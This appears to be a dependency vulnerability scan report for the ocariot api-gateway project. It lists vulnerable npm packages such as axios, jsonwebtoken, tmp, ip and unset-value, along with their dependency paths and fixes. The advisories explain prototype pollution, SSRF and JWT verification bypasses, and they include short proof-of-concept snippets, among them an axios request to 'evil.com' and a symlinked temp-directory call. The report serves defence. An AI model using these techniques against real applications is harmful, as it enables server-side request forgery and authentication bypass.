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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › braces@2.3.2 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › nanomatch@1.2.13 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › fast-glob@2.2.7 › micromatch@3.1.10 › extglob@2.0.4 › expand-brackets@2.1.4 › snapdragon@0.8.2 › base@0.11.2 › cache-base@1.0.1 › unset-value@1.0.0
Overview
Affected versions of this package are vulnerable to Prototype Pollution via the unset function in index.js, because it allows access to object prototype properties.
Details
Prototype Pollution is a vulnerability affecting JavaScript. Prototype Pollution refers to the ability to inject properties into existing JavaScript language construct prototypes, such as objects. JavaScript allows all Object attributes to be altered, including their magical attributes such as __proto__, constructor and prototype. An attacker manipulates these attributes to overwrite, or pollute, a JavaScript application object prototype of the base object by injecting other values. Properties on the Object.prototype are then inherited by all the JavaScript objects through the prototype chain. When that happens, this leads to either denial of service by triggering JavaScript exceptions, or it tampers with the application source code to force the code path that the attacker injects, thereby leading to remote code execution.
There are two main ways in which the pollution of prototypes occurs:
Unsafe
Objectrecursive mergeProperty definition by path
Unsafe Object recursive merge
The logic of a vulnerable recursive merge function follows the following high-level model:
merge (target, source)
foreach property of source
if property exists and is an object on both the target and the source
merge(target[property], source[property])
else
target[property] = source[property]
When the source object contains a property named __proto__ defined with Object.defineProperty() , the condition that checks if the property exists and is an object on both the target and the source passes and the merge recurses with the target, being the prototype of Object and the source of Object as defined by the attacker. Properties are then copied on the Object prototype.
Clone operations are a special sub-class of unsafe recursive merges, which occur when a recursive merge is conducted on an empty object: merge({},source).
lodash and Hoek are examples of libraries susceptible to recursive merge attacks.
Property definition by path
There are a few JavaScript libraries that use an API to define property values on an object based on a given path. The function that is generally affected contains this signature: theFunction(object, path, value)
If the attacker can control the value of “path”, they can set this value to __proto__.myValue. myValue is then assigned to the prototype of the class of the object.
Types of attacks
There are a few methods by which Prototype Pollution can be manipulated:
| Type | Origin | Short description |
|---|---|---|
| Denial of service (DoS) | Client | This is the most likely attack. DoS occurs when Object holds generic functions that are implicitly called for various operations (for example, toString and valueOf). The attacker pollutes Object.prototype.someattr and alters its state to an unexpected value such as Int or Object. In this case, the code fails and is likely to cause a denial of service. For example: if an attacker pollutes Object.prototype.toString by defining it as an integer, if the codebase at any point was reliant on someobject.toString() it would fail. |
| Remote Code Execution | Client | Remote code execution is generally only possible in cases where the codebase evaluates a specific attribute of an object, and then executes that evaluation. For example: eval(someobject.someattr). In this case, if the attacker pollutes Object.prototype.someattr they are likely to be able to leverage this in order to execute code. |
| Property Injection | Client | The attacker pollutes properties that the codebase relies on for their informative value, including security properties such as cookies or tokens. For example: if a codebase checks privileges for someuser.isAdmin, then when the attacker pollutes Object.prototype.isAdmin and sets it to equal true, they can then achieve admin privileges. |
Affected environments
The following environments are susceptible to a Prototype Pollution attack:
Application server
Web server
Web browser
How to prevent
Freeze the prototype— use
Object.freeze (Object.prototype).Require schema validation of JSON input.
Avoid using unsafe recursive merge functions.
Consider using objects without prototypes (for example,
Object.create(null)), breaking the prototype chain and preventing pollution.As a best practice use
Mapinstead ofObject.
For more information on this vulnerability type:
Arteau, Oliver. “JavaScript prototype pollution attack in NodeJS application.” GitHub, 26 May 2018
Remediation
Upgrade unset-value to version 2.0.1 or higher.
References
high severity
- Vulnerable module: axios
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git and express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › axios@0.20.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Cross-site Request Forgery (CSRF) due to inserting the X-XSRF-TOKEN header using the secret XSRF-TOKEN cookie value in all requests to any server when the XSRF-TOKEN0 cookie is available, and the withCredentials setting is turned on. If a malicious user manages to obtain this value, it can potentially lead to the XSRF defence mechanism bypass.
Workaround
Users should change the default XSRF-TOKEN cookie name in the Axios configuration and manually include the corresponding header only in the specific places where it's necessary.
Remediation
Upgrade axios to version 0.28.0, 1.6.0 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git and express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › axios@0.20.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling via the data: URL handler. An attacker can trigger a denial of service by crafting a data: URL with an excessive payload, causing allocation of memory for content decoding before verifying content size limits.
Remediation
Upgrade axios to version 1.12.0 or higher.
References
medium severity
- Vulnerable module: base-x
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › uuid62@1.0.1 › base-x@3.0.5
Overview
base-x is a Fast base encoding / decoding of any given alphabet
Affected versions of this package are vulnerable to Insufficient Visual Distinction of Homoglyphs Presented to User through the validation process. An attacker can deceive users into sending funds to an unintended address by exploiting Unicode lookalike characters to bypass validation checks.
Remediation
Upgrade base-x to version 3.0.11, 4.0.1, 5.0.1 or higher.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git and express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › jsonwebtoken@8.5.1
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › jsonwebtoken@8.5.1
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Use of a Broken or Risky Cryptographic Algorithm such that the library can be misconfigured to use legacy, insecure key types for signature verification. For example, DSA keys could be used with the RS256 algorithm.
Exploitability
Users are affected when using an algorithm and a key type other than the combinations mentioned below:
EC: ES256, ES384, ES512
RSA: RS256, RS384, RS512, PS256, PS384, PS512
RSA-PSS: PS256, PS384, PS512
And for Elliptic Curve algorithms:
ES256: prime256v1
ES384: secp384r1
ES512: secp521r1
Workaround
Users who are unable to upgrade to the fixed version can use the allowInvalidAsymmetricKeyTypes option to true in the sign() and verify() functions to continue usage of invalid key type/algorithm combination in 9.0.0 for legacy compatibility.
Remediation
Upgrade jsonwebtoken to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: tmp
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › inquirer@7.3.3 › external-editor@3.1.0 › tmp@0.0.33
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › inquirer@7.3.3 › external-editor@3.1.0 › tmp@0.0.33
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › inquirer@7.3.3 › external-editor@3.1.0 › tmp@0.0.33
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › inquirer@7.3.3 › external-editor@3.1.0 › tmp@0.0.33
Overview
Affected versions of this package are vulnerable to Symlink Attack via the dir parameter. An attacker can cause files or directories to be written to arbitrary locations by supplying a crafted symbolic link that resolves outside the intended temporary directory.
PoC
const tmp = require('tmp');
const tmpobj = tmp.fileSync({ 'dir': 'evil-dir'});
console.log('File: ', tmpobj.name);
try {
tmp.fileSync({ 'dir': 'mydir1'});
} catch (err) {
console.log('test 1:', err.message)
}
try {
tmp.fileSync({ 'dir': '/foo'});
} catch (err) {
console.log('test 2:', err.message)
}
try {
const fs = require('node:fs');
const resolved = fs.realpathSync('/tmp/evil-dir');
tmp.fileSync({ 'dir': resolved});
} catch (err) {
console.log('test 3:', err.message)
}
Remediation
Upgrade tmp to version 0.2.4 or higher.
References
medium severity
- Vulnerable module: ip
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › proxy-agent@4.0.1 › pac-proxy-agent@4.1.0 › pac-resolver@4.2.0 › ip@1.1.9
Overview
ip is a Node library.
Affected versions of this package are vulnerable to Server-Side Request Forgery (SSRF) via the isPublic function, which identifies some private IP addresses as public addresses due to improper parsing of the input.
An attacker can manipulate a system that uses isLoopback(), isPrivate() and isPublic functions to guard outgoing network requests to treat certain IP addresses as globally routable by supplying specially crafted IP addresses.
Note
This vulnerability derived from an incomplete fix for CVE-2023-42282
Remediation
There is no fixed version for ip.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git and express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › jsonwebtoken@8.5.1
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › jsonwebtoken@8.5.1
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Improper Restriction of Security Token Assignment via the secretOrPublicKey argument due to misconfigurations of the key retrieval function jwt.verify(). Exploiting this vulnerability might result in incorrect verification of forged tokens when tokens signed with an asymmetric public key could be verified with a symmetric HS256 algorithm.
Note:
This vulnerability affects your application if it supports the usage of both symmetric and asymmetric keys in jwt.verify() implementation with the same key retrieval function.
Remediation
Upgrade jsonwebtoken to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: jsonwebtoken
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git and express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › jsonwebtoken@8.5.1
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › jsonwebtoken@8.5.1
Overview
jsonwebtoken is a JSON Web Token implementation (symmetric and asymmetric)
Affected versions of this package are vulnerable to Improper Authentication such that the lack of algorithm definition in the jwt.verify() function can lead to signature validation bypass due to defaulting to the none algorithm for signature verification.
Exploitability
Users are affected only if all of the following conditions are true for the jwt.verify() function:
A token with no signature is received.
No algorithms are specified.
A falsy (e.g.,
null,false,undefined) secret or key is passed.
Remediation
Upgrade jsonwebtoken to version 9.0.0 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git and express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › axios@0.20.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to the allowAbsoluteUrls attribute being ignored in the call to the buildFullPath function from the HTTP adapter. An attacker could launch SSRF attacks or exfiltrate sensitive data by tricking applications into sending requests to malicious endpoints.
PoC
const axios = require('axios');
const client = axios.create({baseURL: 'http://example.com/', allowAbsoluteUrls: false});
client.get('http://evil.com');
Remediation
Upgrade axios to version 0.30.0, 1.8.2 or higher.
References
medium severity
- Vulnerable module: axios
- Introduced through: express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git and express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-apigw-base-plugin@git+https://github.com/nutes-uepb/express-apigw-base-plugin.git › axios@0.20.0
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › npm-api@1.0.1 › paged-request@2.0.2 › axios@0.21.4
Overview
axios is a promise-based HTTP client for the browser and Node.js.
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF) due to not setting allowAbsoluteUrls to false by default when processing a requested URL in buildFullPath(). It may not be obvious that this value is being used with the less safe default, and URLs that are expected to be blocked may be accepted. This is a bypass of the fix for the vulnerability described in CVE-2025-27152.
Remediation
Upgrade axios to version 0.30.0, 1.8.3 or higher.
References
medium severity
- Vulnerable module: inflight
- Introduced through: express-gateway@1.16.11
Detailed paths
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › globby@8.0.2 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › shelljs@0.8.5 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › globby@8.0.2 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › globby@8.0.2 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › mem-fs-editor@5.1.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › shelljs@0.8.5 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › yeoman-environment@2.10.3 › globby@8.0.2 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › globby@9.2.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › mem-fs-editor@7.1.0 › globby@9.2.0 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › mem-fs-editor@6.0.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
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Introduced through: ocariot-api-gateway@ocariot/api-gateway#d2767e0e0cf819c3e2ccfc6e1cc0be35c5237e83 › express-gateway@1.16.11 › yeoman-generator@3.2.0 › yeoman-environment@2.10.3 › yeoman-generator@4.13.0 › rimraf@2.7.1 › glob@7.2.3 › inflight@1.0.6
